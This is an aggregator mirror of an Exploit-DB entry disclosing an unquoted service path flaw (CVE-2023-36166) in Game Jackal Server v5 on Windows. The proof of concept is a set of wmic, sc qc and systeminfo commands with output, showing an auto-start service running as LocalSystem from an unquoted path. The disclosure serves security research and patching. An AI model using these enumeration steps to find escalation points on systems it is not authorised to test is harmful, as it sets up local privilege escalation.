3

[local] Game Jackal Server v5 - Unquoted Service Path "GJServiceV5"

 1 year ago
source link: https://www.exploit-db.com/exploits/51584
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Game Jackal Server v5 - Unquoted Service Path "GJServiceV5"

EDB-ID:

51584

EDB Verified:

Exploit:

  /  

Platform:

Windows

Date:

2023-07-11

Vulnerable App:

# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.allradiosoft.ru
# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36166

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i
auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Game Jackal Server v5
        GJServiceV5                               C:\Program Files
(x86)\SlySoft\Game Jackal v5\Server.exe                                 Auto

C:\Users>sc qc GJServiceV5
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GJServiceV5
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\SlySoft\Game Jackal
v5\Server.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Game Jackal Server v5
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK